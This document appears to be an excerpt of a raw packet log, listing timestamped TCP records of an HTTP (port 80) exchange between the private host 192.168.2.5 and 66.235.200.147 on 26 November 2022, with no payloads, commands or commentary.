Nov 26, 2022 11:17:40.079436064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079457998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079472065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.079483986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079519987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.079938889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079957962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079978943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079999924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080024004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.080024004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080049992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080068111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.080077887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080101013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080118895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080126047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.080147028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080168962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.080183983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080204010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080220938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080239058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080255985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.080261946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080269098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.080288887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080293894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.080312967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080332041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080342054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.080358028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080377102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080393076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080404997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.080430984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.080959082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080976963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.080993891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081013918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081026077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081039906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081041098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081062078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081080914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081094027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081104994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081120014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081131935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081152916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081173897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081175089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081197977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081212997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081223965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081244946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081264019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081267118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081288099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081301928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081310034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081331015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081346035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081353903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081376076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081392050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081399918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081419945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081434965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081784964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081824064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081836939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081850052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081871986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081892967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081892967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081916094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081929922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.081938982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.081980944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082020044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082062006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082079887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082098007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082108021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082124949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082144022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082149029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082170963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082190990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082192898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082216024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082233906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082240105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082262039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082278967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082285881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082307100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082326889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082329035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082350016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082370043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082382917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082405090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082425117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082427025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082449913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082463026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082475901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082495928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082515001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082515001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082536936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082550049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082561016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082581997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082600117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082606077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082643986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.082961082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082979918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.082998991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083019972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083028078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083049059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083065033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083076954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083098888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083120108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083122015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083147049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083165884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083170891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083195925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083213091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083223104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083245039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083266973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083268881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083292961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083307028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083318949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083340883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083355904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083365917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083388090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083403111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083415985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083436012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083451986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083461046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083483934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083499908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083509922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083547115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083741903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083760977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083779097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083801031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083801985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083827019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083843946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083853006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083878994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083895922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083904982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083926916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083946943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083947897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083971977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.083991051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.083996058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084019899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084038973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084043980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084068060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084086895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084090948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084125042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084142923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084145069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084181070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084182024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084203005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084219933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084239006 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084243059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084263086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084280968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084285021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084306002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084321976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084327936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084347963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084363937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084371090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084391117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084407091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084738016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084755898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084774971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084790945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084799051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084820986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084822893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084865093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084886074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084887981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084913015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084932089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084938049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084958076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.084974051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.084984064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085006952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085026979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085031986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085055113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085073948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085078001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085100889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085119009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085124016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085149050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085160971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085176945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085199118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085215092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085222006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085243940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085258007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085268974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085289955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085305929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085315943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085336924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085355997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085364103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085390091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085400105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085417032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085453987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085618019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085638046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085656881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085678101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085683107 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085704088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085720062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085728884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085752010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085771084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085787058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085794926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085813999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085823059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085844040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085865974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085865974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085891008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085905075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085917950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085939884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085958958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.085963011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.085987091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086004972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086010933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086033106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086052895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086060047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086088896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086090088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086111069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086128950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086148024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086152077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086174011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086186886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086198092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086219072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086236954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086241961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086263895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086277008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086287975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086323977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086569071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086606026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086618900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086631060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086653948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086671114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086689949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086693048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086718082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086724997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086745024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086757898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086771011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086791039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086812019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086817026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086837053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086852074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086860895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086903095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086910009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086931944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086951017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086968899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.086972952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.086994886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087007046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087022066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087064981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087093115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087110996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087147951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087186098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087203979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087222099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087245941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087260962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087280035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087296963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087306023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087321997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087344885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087344885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087368011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087388992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087388992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087413073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087430000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087434053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087456942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087476969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.087479115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.087501049 CET	80	49707	66.235.200.147	192.168.2.5
